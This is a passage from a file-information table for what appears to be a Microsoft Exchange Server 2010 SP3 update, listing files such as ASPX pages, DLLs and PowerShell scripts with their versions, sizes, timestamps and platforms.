Not applicable| 6,908| 03-Jan-2020| 05:49| Not applicable \nBasiccalendarview.aspx| Not applicable| 3,259| 03-Jan-2020| 05:49| Not applicable \nBasiccontactview.aspx| Not applicable| 3,586| 03-Jan-2020| 05:49| Not applicable \nBasiccontactviewwebpart.aspx| Not applicable| 2,485| 03-Jan-2020| 05:49| Not applicable \nBasiceditcalendaritem.aspx| Not applicable| 17,517| 03-Jan-2020| 05:49| Not applicable \nBasiceditcontact.aspx| Not applicable| 6,356| 03-Jan-2020| 05:49| Not applicable \nBasiceditmeetingresponse.aspx| Not applicable| 11,664| 03-Jan-2020| 05:49| Not applicable \nBasiceditmessage.aspx| Not applicable| 8,801| 03-Jan-2020| 05:49| Not applicable \nBasiceditrecurrence.aspx| Not applicable| 14,645| 03-Jan-2020| 05:49| Not applicable \nBasicfoldermanagement.aspx| Not applicable| 3,630| 03-Jan-2020| 05:49| Not applicable \nBasicmeetingpage.aspx| Not applicable| 12,659| 03-Jan-2020| 05:49| Not applicable \nBasicmessageview.aspx| Not applicable| 4,084| 03-Jan-2020| 05:49| Not applicable \nBasicmessageviewwebpart.aspx| Not applicable| 2,625| 03-Jan-2020| 05:49| Not applicable \nBasicmoveitem.aspx| Not applicable| 4,112| 03-Jan-2020| 05:49| Not applicable \nBasicoptions.aspx| Not applicable| 3,506| 03-Jan-2020| 05:49| Not applicable \nBasicreadaddistributionlist.aspx| Not applicable| 4,364| 03-Jan-2020| 05:49| Not applicable \nBasicreadadorgperson.aspx| Not applicable| 4,434| 03-Jan-2020| 05:49| Not applicable \nBasicreadcontact.aspx| Not applicable| 4,406| 03-Jan-2020| 05:49| Not applicable \nBasicreaddistributionlist.aspx| Not applicable| 4,864| 03-Jan-2020| 05:49| Not applicable \nBasicreadmessage.aspx| Not applicable| 7,071| 03-Jan-2020| 05:49| Not applicable \nBpa.common.dll| 14.3.470.0| 233,160| 03-Jan-2020| 05:48| x86 \nBpa.configcollector.dll| 14.3.470.0| 126,664| 03-Jan-2020| 05:48| x86 \nBpa.networkcollector.dll| 14.3.470.0| 69,320| 03-Jan-2020| 05:48| x86 \nBpa.userinterface.dll| 14.3.470.0| 536,264| 03-Jan-2020| 05:48| x86 \nBpa.wizardengine.dll| 14.3.470.0| 134,856| 03-Jan-2020| 05:49| x86 \nBsres.dll| 14.3.470.0| 92,592| 03-Jan-2020| 05:47| x64 \nC3197ef34a9e495cb17370b20389036a_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nC4f748eeabe04db79b17bab56b1285a4_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nCalcalculation.ps1| Not applicable| 29,804| 03-Jan-2020| 05:47| Not applicable \nCaptedt.js| Not applicable| 11,208| 03-Jan-2020| 05:46| Not applicable \nCasredirect.aspx| Not applicable| 4,842| 03-Jan-2020| 05:49| Not applicable \nCb8b92743d7f42a7b8e53fe033206469_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 80,171| 03-Jan-2020| 05:47| Not applicable \nCheckinvalidrecipients.ps1| Not applicable| 20,921| 03-Jan-2020| 05:47| Not applicable \nChksgfiles.dll| 14.3.470.0| 64,944| 03-Jan-2020| 05:46| x64 \nCitsconstants.ps1| Not applicable| 19,383| 03-Jan-2020| 05:49| Not applicable \nCitslibrary.ps1| Not applicable| 171,567| 03-Jan-2020| 05:49| Not applicable \nCitstypes.ps1| Not applicable| 16,664| 03-Jan-2020| 05:49| Not applicable \nClusmsg.dll| 14.3.470.0| 110,512| 03-Jan-2020| 05:48| x64 \nCmmap000.bin| Not applicable| 381,737| 03-Jan-2020| 05:49| Not applicable \nCmn.js| Not applicable| 7,356| 03-Jan-2020| 05:46| Not applicable \nCobrandingdiagnostics.aspx| Not applicable| 1,649| 03-Jan-2020| 05:49| Not applicable \nCollectovermetrics.ps1| Not applicable| 77,533| 03-Jan-2020| 05:47| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 39,794| 03-Jan-2020| 05:47| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 27,543| 03-Jan-2020| 05:45| Not applicable \nConfigureadam.ps1| Not applicable| 21,183| 03-Jan-2020| 05:47| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 16,878| 03-Jan-2020| 05:47| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 37,701| 03-Jan-2020| 05:47| Not applicable \nConnectfunctions.ps1| Not applicable| 32,908| 03-Jan-2020| 05:47| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 28,838| 03-Jan-2020| 05:47| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,273| 03-Jan-2020| 05:45| Not applicable \nConvertoabvdir.ps1| Not applicable| 17,929| 03-Jan-2020| 05:47| Not applicable \nConverttomessagelatency.ps1| Not applicable| 12,408| 03-Jan-2020| 05:47| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCtsvw.js| Not applicable| 1,982| 03-Jan-2020| 05:46| Not applicable \nCts_exsmime.dll| 14.3.470.0| 319,920| 03-Jan-2020| 05:46| x64 \nCts_microsoft.exchange.data.common.dll| 14.3.470.0| 1,547,976| 03-Jan-2020| 05:46| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 493| 03-Jan-2020| 05:48| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:46| x86 \nDaddrbk.js| Not applicable| 5,533| 03-Jan-2020| 05:46| Not applicable \nDagcommonlibrary.ps1| Not applicable| 47,638| 03-Jan-2020| 05:47| Not applicable \nDattach.js| Not applicable| 2,597| 03-Jan-2020| 05:46| Not applicable \nDess.dll| 8.5.3.76| 202,080| 03-Jan-2020| 05:49| x64 \nDevect.dll| 8.5.3.76| 1,883,488| 03-Jan-2020| 05:49| x64 \nDewp.dll| 8.5.3.76| 294,240| 03-Jan-2020| 05:49| x64 \nDf9d06af701642c98d336e7d2e95781c_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nDiagnosticcmdletcontroller.dll| 14.3.470.0| 47,560| 03-Jan-2020| 05:46| x64 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 14,864| 03-Jan-2020| 05:49| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 11,238| 03-Jan-2020| 05:47| Not applicable \nDisable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 03-Jan-2020| 05:48| Not applicable \nDsaccess.dll| 14.3.470.0| 842,160| 03-Jan-2020| 05:46| x64 \nDsaccessperf.dll| 14.3.470.0| 53,680| 03-Jan-2020| 05:46| x64 \nDscperf.dll| 14.3.470.0| 31,664| 03-Jan-2020| 05:46| x64 \nDup_cts_microsoft.exchange.data.common.dll| 14.3.470.0| 1,547,976| 03-Jan-2020| 05:46| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 14.3.470.0| 335,704| 03-Jan-2020| 05:46| x86 \nEcpperfcounters.xml| Not applicable| 29,280| 03-Jan-2020| 05:48| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,320| 03-Jan-2020| 05:46| x86 \nEdgetransport.exe| 14.3.470.0| 35,976| 03-Jan-2020| 05:48| x86 \nEditorstandalone.js| Not applicable| 298,514| 03-Jan-2020| 05:46| Not applicable \nEdittask.aspx| Not applicable| 11,565| 03-Jan-2020| 05:49| Not applicable \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 496| 03-Jan-2020| 05:48| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,336| 03-Jan-2020| 05:46| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,320| 03-Jan-2020| 05:46| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,312| 03-Jan-2020| 05:46| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,320| 03-Jan-2020| 05:46| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,312| 03-Jan-2020| 05:46| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,336| 03-Jan-2020| 05:46| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 14.3.470.0| 20,336| 03-Jan-2020| 05:46| x86 \nEf306e728a08437e80fe5a896ded4b48_premium.css| Not applicable| 202,304| 03-Jan-2020| 05:47| Not applicable \nEnableinmemorytracing.ps1| Not applicable| 11,240| 03-Jan-2020| 05:47| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 16,474| 03-Jan-2020| 05:47| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 26,785| 03-Jan-2020| 05:47| Not applicable \nEnable_shouldmarkandskipoccupiedcatalog.reg| Not applicable| 288| 03-Jan-2020| 05:48| Not applicable \nEscprint.dll| 14.3.470.0| 28,104| 03-Jan-2020| 05:48| x64 \nEse.dll| 14.3.470.0| 3,226,056| 03-Jan-2020| 05:46| x64 \nEseback2.dll| 14.3.470.0| 170,928| 03-Jan-2020| 05:48| x64 \nEsebcli2.dll| 14.3.470.0| 118,704| 03-Jan-2020| 05:48| x64 \nEseperf.dll| 14.3.470.0| 63,408| 03-Jan-2020| 05:48| x64 \nEseutil.exe| 14.3.470.0| 328,624| 03-Jan-2020| 05:48| x64 \nEsevss.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:48| x64 \nExabp.dll| 14.3.470.0| 266,672| 03-Jan-2020| 05:48| x64 \nExbpa.config.xml| Not applicable| 1,150,789| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.clientaccess.xml| Not applicable| 18,445| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.global.xml| Not applicable| 18,835| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.mailbox.xml| Not applicable| 84,500| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.transport.xml| Not applicable| 26,051| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.unifiedmessaging.xml| Not applicable| 20,699| 03-Jan-2020| 05:49| Not applicable \nExbpa.e12.xml| Not applicable| 20,774| 03-Jan-2020| 05:49| Not applicable \nExbpa.esecollector.dll| 14.3.470.0| 102,088| 03-Jan-2020| 05:48| x86 \nExbpa.exchangecollector.dll| 14.3.470.0| 29,384| 03-Jan-2020| 05:48| x86 \nExbpa.exe| 14.3.470.0| 77,512| 03-Jan-2020| 05:46| x86 \nExbpa.permissions.xml| Not applicable| 95,797| 03-Jan-2020| 05:49| Not applicable \nExbpa.prereqs.xml| Not applicable| 222,941| 03-Jan-2020| 05:49| Not applicable \nExbpa.rbac.xml| Not applicable| 42,101| 03-Jan-2020| 05:49| Not applicable \nExbpa.readiness.xml| Not applicable| 71,654| 03-Jan-2020| 05:49| Not applicable \nExbpa.shared.dll| 14.3.470.0| 130,760| 03-Jan-2020| 05:48| x86 \nExbpa.stayinginformed.config.xml| Not applicable| 43,427| 03-Jan-2020| 05:47| Not applicable \nExbpa.transport.xml| Not applicable| 37,643| 03-Jan-2020| 05:49| Not applicable \nExbpacmd.exe| 14.3.470.0| 28,872| 03-Jan-2020| 05:48| x86 \nExbpamdb.dll| 14.3.470.0| 25,000| 03-Jan-2020| 05:49| x64 \nExbpamon.dll| 14.3.470.0| 122,800| 03-Jan-2020| 05:49| x64 \nExchange.format.ps1xml| Not applicable| 263,266| 03-Jan-2020| 05:47| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 19,223| 03-Jan-2020| 05:47| Not applicable \nExchange.ps1| Not applicable| 19,316| 03-Jan-2020| 05:45| Not applicable \nExchange.support.format.ps1xml| Not applicable| 23,089| 03-Jan-2020| 05:47| Not applicable \nExchange.types.ps1xml| Not applicable| 361,212| 03-Jan-2020| 05:47| Not applicable \nExchangeblog.xml| Not applicable| 119,220| 03-Jan-2020| 05:47| Not applicable \nExchmem.dll| 14.3.470.0| 71,600| 03-Jan-2020| 05:46| x64 \nExchsetupmsg.dll| 14.3.470.0| 19,880| 03-Jan-2020| 05:47| x64 \nExchucutil.ps1| Not applicable| 21,531| 03-Jan-2020| 05:47| Not applicable \nExdbfailureitemapi.dll| 14.3.470.0| 65,480| 03-Jan-2020| 05:48| x64 \nExdbmsg.dll| 14.3.470.0| 155,592| 03-Jan-2020| 05:48| x64 \nExfba.exe| 14.3.470.0| 111,024| 03-Jan-2020| 05:49| x64 \nExgdsf.dll| 8.5.3.76| 16,224| 03-Jan-2020| 05:49| x64 \nExhtml.dll| 8.5.3.76| 640,352| 03-Jan-2020| 05:49| x64 \nExmfa.config.xml| Not applicable| 874,094| 03-Jan-2020| 05:49| Not applicable \nExmime.dll| 14.3.470.0| 339,888| 03-Jan-2020| 05:46| x64 \nExpiredpassword.aspx| Not applicable| 7,226| 03-Jan-2020| 05:49| Not applicable \nExportedgeconfig.ps1| Not applicable| 25,266| 03-Jan-2020| 05:47| Not applicable \nExport_outlookclassification.ps1| Not applicable| 12,376| 03-Jan-2020| 05:46| Not applicable \nExport_retentiontags.ps1| Not applicable| 14,920| 03-Jan-2020| 05:47| Not applicable \nExppw.dll| 14.3.470.0| 73,648| 03-Jan-2020| 05:49| x64 \nExprfdll.dll| 14.3.470.0| 33,192| 03-Jan-2020| 05:46| x64 \nExpta.config.xml| Not applicable| 557,925| 03-Jan-2020| 05:49| Not applicable \nExpta.e12.collection.xml| Not applicable| 227,026| 03-Jan-2020| 05:49| Not applicable \nExrdrlbs.dll| 14.3.470.0| 31,152| 03-Jan-2020| 05:47| x64 \nExrpc32.dll| 14.3.470.0| 1,665,968| 03-Jan-2020| 05:48| x64 \nExrw.dll| 14.3.470.0| 35,248| 03-Jan-2020| 05:48| x64 \nExsetdata.dll| 14.3.470.0| 1,811,888| 03-Jan-2020| 05:45| x64 \nExsetup.exe| 14.3.496.0| 41,864| 03-Jan-2020| 05:47| x86 \nExsetupui.exe| 14.3.470.0| 261,760| 03-Jan-2020| 05:47| x86 \nExtra.config.xml| Not applicable| 35,001| 03-Jan-2020| 05:49| Not applicable \nExtra.exe| 14.3.470.0| 130,760| 03-Jan-2020| 05:49| x86 \nExtrace.dll| 14.3.470.0| 170,416| 03-Jan-2020| 05:48| x64 \nExtraceman.config.xml| Not applicable| 87,680| 03-Jan-2020| 05:49| Not applicable \nExtraceman.dll| 14.3.470.0| 69,320| 03-Jan-2020| 05:49| x86 \nExt_microsoft.exchange.data.transport.dll| 14.3.470.0| 335,704| 03-Jan-2020| 05:46| x86 \nExwriter.dll| 14.3.470.0| 545,192| 03-Jan-2020| 05:48| x64 \nFadcnt.js| Not applicable| 5,192| 03-Jan-2020| 05:46| Not applicable \nFedtcali.js| Not applicable| 110,582| 03-Jan-2020| 05:46| Not applicable \nFedtrul.js| Not applicable| 30,339| 03-Jan-2020| 05:46| Not applicable \nFixed.skin| Not applicable| 12,879| 03-Jan-2020| 05:48| Not applicable \nFlogon.js| Not applicable| 4,296| 03-Jan-2020| 05:46| Not applicable \nFreadmsg.js| Not applicable| 13,127| 03-Jan-2020| 05:46| Not applicable \nGalgrammargenerator.exe| 14.3.470.0| 27,784| 03-Jan-2020| 05:48| x86 \nGetdatabaseforsearchindex.ps1| Not applicable| 13,449| 03-Jan-2020| 05:47| Not applicable \nGetsearchindexfordatabase.ps1| Not applicable| 13,373| 03-Jan-2020| 05:47| Not applicable \nGetucpool.ps1| Not applicable| 17,620| 03-Jan-2020| 05:47| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 13,717| 03-Jan-2020| 05:48| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 12,567| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 13,635| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 12,683| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 13,406| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 12,613| 03-Jan-2020| 05:48| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 12,718| 03-Jan-2020| 05:48| Not applicable \nGet_setuplog.ps1| Not applicable| 15,222| 03-Jan-2020| 05:45| Not applicable \nGet_setuplog_help.xml| Not applicable| 22,267| 03-Jan-2020| 05:47| Not applicable \nGoogle.protocolbuffers.dll| 2.4.1.521| 325,504| 03-Jan-2020| 05:49| x86 \nGradienth.png| Not applicable| 118| 03-Jan-2020| 05:46| Not applicable \nHuffman_xpress.dll| 14.3.470.0| 40,368| 03-Jan-2020| 05:48| x64 \nIbfpx2.dll| 8.5.3.76| 145,760| 03-Jan-2020| 05:49| x64 \nIbgp42.dll| 8.5.3.76| 41,312| 03-Jan-2020| 05:49| x64 \nIbjpg2.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nIbpcd2.dll| 8.5.3.76| 171,872| 03-Jan-2020| 05:49| x64 \nIbpsd2.dll| 8.5.3.76| 42,336| 03-Jan-2020| 05:49| x64 \nIbxbm2.dll| 8.5.3.76| 35,680| 03-Jan-2020| 05:49| x64 \nIbxpm2.dll| 8.5.3.76| 67,936| 03-Jan-2020| 05:49| x64 \nIbxwd2.dll| 8.5.3.76| 37,728| 03-Jan-2020| 05:49| x64 \nIm.js| Not applicable| 54,992| 03-Jan-2020| 05:46| Not applicable \nImcd32.dll| 8.5.3.76| 123,744| 03-Jan-2020| 05:49| x64 \nImcd42.dll| 8.5.3.76| 142,688| 03-Jan-2020| 05:49| x64 \nImcd52.dll| 8.5.3.76| 144,736| 03-Jan-2020| 05:49| x64 \nImcd62.dll| 8.5.3.76| 159,072| 03-Jan-2020| 05:49| x64 \nImcd72.dll| 8.5.3.76| 279,392| 03-Jan-2020| 05:49| x64 \nImcd82.dll| 8.5.3.76| 279,392| 03-Jan-2020| 05:49| x64 \nImcdr2.dll| 8.5.3.76| 73,056| 03-Jan-2020| 05:49| x64 \nImcm52.dll| 8.5.3.76| 63,840| 03-Jan-2020| 05:49| x64 \nImcm72.dll| 8.5.3.76| 117,088| 03-Jan-2020| 05:49| x64 \nImcmx2.dll| 8.5.3.76| 32,096| 03-Jan-2020| 05:49| x64 \nImdsf2.dll| 8.5.3.76| 168,288| 03-Jan-2020| 05:49| x64 \nImfmv2.dll| 8.5.3.76| 67,424| 03-Jan-2020| 05:49| x64 \nImgdf2.dll| 8.5.3.76| 77,664| 03-Jan-2020| 05:49| x64 \nImgem2.dll| 8.5.3.76| 56,672| 03-Jan-2020| 05:49| x64 \nImigs2.dll| 8.5.3.76| 117,088| 03-Jan-2020| 05:49| x64 \nImmet2.dll| 8.5.3.76| 167,264| 03-Jan-2020| 05:49| x64 \nImpif2.dll| 8.5.3.76| 71,008| 03-Jan-2020| 05:49| x64 \nImportedgeconfig.ps1| Not applicable| 77,620| 03-Jan-2020| 05:47| Not applicable \nImport_retentiontags.ps1| Not applicable| 26,811| 03-Jan-2020| 05:47| Not applicable \nImpsi2.dll| 8.5.3.76| 2,031,968| 03-Jan-2020| 05:49| x64 \nImpsz2.dll| 8.5.3.76| 35,168| 03-Jan-2020| 05:49| x64 \nImps_2.dll| 8.5.3.76| 124,256| 03-Jan-2020| 05:49| x64 \nImrnd2.dll| 8.5.3.76| 38,752| 03-Jan-2020| 05:49| x64 \nInfo.aspx| Not applicable| 3,447| 03-Jan-2020| 05:49| Not applicable \nInproxy.dll| 14.3.470.0| 95,664| 03-Jan-2020| 05:45| x64 \nInstallwindowscomponent.ps1| Not applicable| 25,053| 03-Jan-2020| 05:47| Not applicable \nInstall_antispamagents.ps1| Not applicable| 14,528| 03-Jan-2020| 05:48| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.470.0| 126,600| 03-Jan-2020| 05:50| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.470.0| 27,272| 03-Jan-2020| 05:50| Not applicable \nInterop.certenroll.dll| 14.3.470.0| 155,272| 03-Jan-2020| 05:48| x64 \nInterop.migbase.dll| 14.3.470.0| 57,184| 03-Jan-2020| 05:46| x86 \nInterop.netfw.dll| 14.3.470.0| 48,776| 03-Jan-2020| 05:46| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 14.3.470.0| 32,904| 03-Jan-2020| 05:50| Not applicable \nInterop.wuapilib.dll| 14.3.470.0| 77,656| 03-Jan-2020| 05:50| x86 \nInterop.xenroll.dll| 14.3.470.0| 56,968| 03-Jan-2020| 05:46| x64 \nIphgw2.dll| 8.5.3.76| 222,048| 03-Jan-2020| 05:49| x64 \nIsgdi32.dll| 8.5.3.76| 1,406,312| 03-Jan-2020| 05:49| x64 \nIsinteg.exe| 14.3.470.0| 456,648| 03-Jan-2020| 05:48| x64 \nKerbauth.dll| 14.3.470.0| 69,552| 03-Jan-2020| 05:48| x64 \nLanguageselection.aspx| Not applicable| 5,421| 03-Jan-2020| 05:49| Not applicable \nLargetoken_iis_ews.ps1| Not applicable| 19,631| 03-Jan-2020| 05:47| Not applicable \nLargetoken_kerberos.ps1| Not applicable| 13,874| 03-Jan-2020| 05:47| Not applicable \nLogoff.aspx| Not applicable| 6,067| 03-Jan-2020| 05:49| Not applicable \nLogon.aspx| Not applicable| 13,479| 03-Jan-2020| 05:49| Not applicable \nLpsetupui.exe| 14.3.470.0| 241,288| 03-Jan-2020| 05:47| x86 \nLpversioning.xml| Not applicable| 17,581| 03-Jan-2020| 05:47| Not applicable \nMad.exe| 14.3.470.0| 1,371,592| 03-Jan-2020| 05:45| x64 \nMadmsg.dll| 14.3.470.0| 108,456| 03-Jan-2020| 05:45| x64 \nMailboxdatabasereseedusingspares.ps1| Not applicable| 38,829| 03-Jan-2020| 05:47| Not applicable \nManagescheduledtask.ps1| Not applicable| 34,405| 03-Jan-2020| 05:47| Not applicable \nMapiprotocolhandlerstub.dll| 14.3.470.0| 81,840| 03-Jan-2020| 05:48| x64 \nMdbevent.dll| 14.3.470.0| 500,136| 03-Jan-2020| 05:48| x64 \nMdbmsg.dll| 14.3.470.0| 231,856| 03-Jan-2020| 05:46| x64 \nMdbperf.dll| 14.3.470.0| 475,568| 03-Jan-2020| 05:50| x64 \nMdbperf.ini| Not applicable| 724,818| 03-Jan-2020| 05:46| Not applicable \nMdbperfx.dll| 14.3.470.0| 476,080| 03-Jan-2020| 05:50| x64 \nMdbrest.dll| 14.3.470.0| 704,944| 03-Jan-2020| 05:48| x64 \nMdbsz.dll| 14.3.470.0| 56,752| 03-Jan-2020| 05:48| x64 \nMdbtask.dll| 14.3.470.0| 455,624| 03-Jan-2020| 05:48| x64 \nMeetingpage.aspx| Not applicable| 12,927| 03-Jan-2020| 05:49| Not applicable \nMessages.xsd| Not applicable| 21,147| 03-Jan-2020| 05:49| Not applicable \nMicrosoft.dkm.proxy.dll| 14.3.470.0| 44,744| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.abproviders.ad.dll| 14.3.470.0| 48,840| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 14.3.470.0| 20,912| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.addressbook.service.exe| 14.3.487.0| 155,344| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 14.3.470.0| 49,584| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.airsync.dll1| 14.3.487.0| 1,183,440| 03-Jan-2020| 05:45| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 14.3.487.0| 69,328| 03-Jan-2020| 05:45| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 14.3.470.0| 27,048| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 14.3.470.0| 21,936| 03-Jan-2020| 05:50| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 14.3.470.0| 44,896| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.approval.applications.dll| 14.3.487.0| 69,328| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.assistants.dll| 14.3.487.0| 233,168| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 14.3.470.0| 29,608| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 14.3.470.0| 19,888| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 14.3.487.0| 65,232| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.authorizationplugin.dll| 14.3.487.0| 78,544| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.authservicehostservicelet.dll| 14.3.470.0| 22,656| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.autodiscover.dll| 14.3.487.0| 282,320| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 14.3.470.0| 27,568| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.cabutility.dll| 14.3.470.0| 264,328| 03-Jan-2020| 05:45| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 14.3.470.0| 22,448| 03-Jan-2020| 05:47| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 14.3.470.0| 40,584| 03-Jan-2020| 05:47| x86 \nMicrosoft.exchange.clients.common.dll| 14.3.470.0| 61,128| 03-Jan-2020| 05:49| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 14.3.470.0| 82,864| 03-Jan-2020| 05:49| x64 \nMicrosoft.exchange.clients.owa.dll| 14.3.487.0| 3,321,560| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.clients.security.dll| 14.3.487.0| 89,808| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.clients.strings.dll| 14.3.470.0| 966,344| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.cluster.replay.dll| 14.3.487.0| 1,969,880| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 14.3.470.0| 101,064| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 14.3.487.0| 184,528| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.common.dll| 14.3.470.0| 110,280| 03-Jan-2020| 05:46| x86 \nMicrosoft.exchange.common.il.dll| 14.3.470.0| 20,168| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.common.processmanagermsg.dll| 14.3.470.0| 24,488| 03-Jan-2020| 05:48| x64 \nMicrosoft.exchange.commonmsg.dll| 14.3.470.0| 29,104| 03-Jan-2020| 05:46| x64 \nMicrosoft.exchange.compliance.dll| 14.3.470.0| 57,032| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 14.3.487.0| 57,040| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.configuration.delegatedauth.dll| 14.3.470.0| 61,128| 03-Jan-2020| 05:48| x86 \nMicrosoft.exchange.configuration.objectmodel.dll| 14.3.487.0| 1,052,368| 